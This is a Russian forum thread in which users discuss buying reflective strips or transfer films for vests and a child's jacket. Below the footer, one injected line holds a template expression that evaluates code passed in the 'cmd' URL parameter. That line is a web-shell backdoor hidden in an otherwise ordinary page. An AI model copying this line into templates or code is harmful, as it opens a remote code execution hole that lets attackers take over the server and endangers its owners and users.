+ Ответить в теме
Показано с 1 по 4 из 4

Тема: Светоотражайки


  1. #1
    Мимо проходил Samuil is on a distinguished road Аватар для Samuil
    Регистрация
    16.12.2018
    Сообщений
    78

    Светоотражайки

    Решили с мужиками сделать себе жилеты со светоотражающими полосами, я еще и малому на куртку хочу, а то темнеет рано, а он из секции идет вдоль дороги. Кто-то в курсе, отдельно такие полосы где-то есть в продаже, типа чтобы купить и нашить?

  2. #2
    Мы своему такую куртку покупали. Специально искали с полосой. И рюкзак такой же. А я даже и не знал, что можно отдельно светоотражайки брать, а то нам та куртка обошлась очень недешево, а ее буквально на сезон хватит - быстро растет.

  3. #3
    Мимо проходил Kirillov is on a distinguished road Аватар для Kirillov
    Регистрация
    13.12.2018
    Машина
    Есть
    Сообщений
    78
    Ну, о том, что такие полосы идут в виде нашивок, я лично никогда раньше не слышал, но все может быть. А вот о том, что есть специальные светоотражающие пленки, которые переносятся на ткань, слыхал. Если хотите, вот здесь почитайте об этом. Только я не уверен, что эта технология доступна в домашних условиях. Скорее всего вам нужно будет отправлять одежду на фирму для нанесения.
    Последний раз редактировалось Kirillov; 16.12.2018 в 13:12.

  4. #4
    Мимо проходил Бормен is on a distinguished road Аватар для Бормен
    Регистрация
    15.12.2018
    Машина
    Б/у
    Сообщений
    75
    Я вроде видел в продаже готовые жилеты, но правда там оптом только были. Ну может и в розницу есть, но я не интересовался честно говоря. Пока штрафовать за отсутствие жилетов не начнут, покупать не буду.

+ Ответить в теме

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}